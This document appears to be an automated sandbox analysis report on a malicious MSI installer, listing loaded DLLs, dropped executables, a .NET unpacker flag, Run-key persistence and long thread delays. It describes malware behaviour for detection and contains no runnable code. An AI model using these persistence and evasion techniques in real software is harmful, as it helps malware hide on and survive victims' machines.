Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttpcom.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msdart.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: zipfldr.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dui70.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: duser.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: chartv.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: oleacc.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: atlthunk.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: shdocvw.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: explorerframe.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: shdocvw.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: shdocvw.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\SysWOW64\shutdown.exeSection loaded: shutdownext.dllJump to behavior
Source: C:\Windows\SysWOW64\shutdown.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeSection loaded: msedge_elf.dllJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeSection loaded: rasman.dllJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeSection loaded: msedge_elf.dllJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile written: C:\Users\user\AppData\Local\AdvinstAnalytics\664501ed20a59ade4c238d57\6.5.7.4\tracking.iniJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: 2ztvLMT477.msiStatic file information: File size 5453039 > 1048576
Source: Binary string: C:\Users\erand\Dropbox\Dev\ag.v66\Libraries\VMRuntime\obj\Trial\AgileDotNet.VMRuntime.pdb source: COSMDOKLO.COSMDOKLO.dll.3.dr
Source: Binary string: wininet.pdb source: shi2829.tmp.3.dr
Source: Binary string: C:\JobRelease\win\Release\bin\x86\embeddeduiproxy.pdb source: 2ztvLMT477.msi, 6625d7.msi.1.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\SoftwareDetector.pdb source: 2ztvLMT477.msi, MSI27FE.tmp.1.dr, 6625d7.msi.1.dr
Source: Binary string: D:\a\_work\e\src\out\Release\identity_helper.exe.pdb source: EpIiyF_GAaICB.exe, 0000000B.00000000.2318946054.0000000000D9D000.00000002.00000001.01000000.00000004.sdmp, EpIiyF_GAaICB.exe, 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmp, EpIiyF_GAaICB.exe, 0000000C.00000002.2404884425.0000000000D9D000.00000002.00000001.01000000.00000004.sdmp, EpIiyF_GAaICB.exe, 0000000C.00000000.2401484094.0000000000D9D000.00000002.00000001.01000000.00000004.sdmp, senhor.exe.3.dr
Source: Binary string: d3d12.pdbUGP source: shi2887.tmp.3.dr
Source: Binary string: d3d12.pdb source: shi2887.tmp.3.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\SoftwareDetector.pdb\ source: 2ztvLMT477.msi, MSI27FE.tmp.1.dr, 6625d7.msi.1.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\InstallerAnalytics.pdbu source: 2ztvLMT477.msi, MSI88B2.tmp.1.dr, 6625d7.msi.1.dr, MSI270F.tmp.1.dr, MSI3475.tmp.1.dr, MSI3378.tmp.1.dr, MSI33A8.tmp.1.dr
Source: Binary string: wininet.pdbUGP source: shi2829.tmp.3.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\InstallerAnalytics.pdb source: 2ztvLMT477.msi, MSI88B2.tmp.1.dr, 6625d7.msi.1.dr, MSI270F.tmp.1.dr, MSI3475.tmp.1.dr, MSI3378.tmp.1.dr, MSI33A8.tmp.1.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: 2ztvLMT477.msi, 6625d7.msi.1.dr, MSI3445.tmp.1.dr, MSI27CE.tmp.1.dr, MSI279E.tmp.1.dr, MSI278D.tmp.1.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbg source: 2ztvLMT477.msi, 6625d7.msi.1.dr, MSI3445.tmp.1.dr, MSI27CE.tmp.1.dr, MSI279E.tmp.1.dr, MSI278D.tmp.1.dr

Data Obfuscation

barindex
.NET source code contains potential unpacker
Source: COSMDOKLO.COSMDOKLO.dll.3.dr, Fnc-.cs.Net Code: Knc_003D
Source: shi2887.tmp.3.drStatic PE information: 0x96D7AA59 [Sat Mar 12 16:44:09 2050 UTC]
Source: senhor.exe.3.drStatic PE information: section name: .00cfg
Source: shi2829.tmp.3.drStatic PE information: section name: .wpp_sf
Source: shi2829.tmp.3.drStatic PE information: section name: .didat
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00CC7A90 push 89084589h; iretd 11_2_00CC7A95
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00D62B0B push ecx; ret 11_2_00D62B1E
Source: senhor.exe.3.drStatic PE information: section name: .text entropy: 6.805436741598088
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3378.tmpJump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\EpIiyF\GAaICB\senhora.exeJump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\shi2829.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI27CE.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3445.tmpJump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\EpIiyF\GAaICB\COSMDOKLO.COSMDOKLO.dllJump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exe (copy)Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\shi2887.tmpJump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\EpIiyF\GAaICB\senhor.exeJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3475.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI270F.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI278D.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI88B2.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI33A8.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI27FE.tmpJump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\EpIiyF\GAaICB\msedge_elf.dll.exe (copy)Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\EpIiyF\GAaICB\msedge_elf.dll (copy)Jump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI279E.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3378.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI27CE.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3445.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3475.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI270F.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI278D.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI88B2.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI33A8.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI27FE.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI279E.tmpJump to dropped file
Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run EpIiyFGAaICBJump to behavior
Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run EpIiyFGAaICBJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeMemory allocated: 55A0000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeMemory allocated: 7120000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeMemory allocated: 55F0000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeMemory allocated: 5240000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeMemory allocated: 6D20000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeMemory allocated: 5310000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeCode function: 11_2_00D269C0 rdtsc 11_2_00D269C0
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeThread delayed: delay time: 599891Jump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeWindow / User API: threadDelayed 8137Jump to behavior
Source: C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exeWindow / User API: threadDelayed 1702Jump to behavior
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI3378.tmpJump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Users\user\EpIiyF\GAaICB\senhora.exeJump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\shi2829.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI27CE.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI3445.tmpJump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Users\user\EpIiyF\GAaICB\COSMDOKLO.COSMDOKLO.dllJump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\shi2887.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI3475.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI270F.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI278D.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI88B2.tmpJump to dropped file
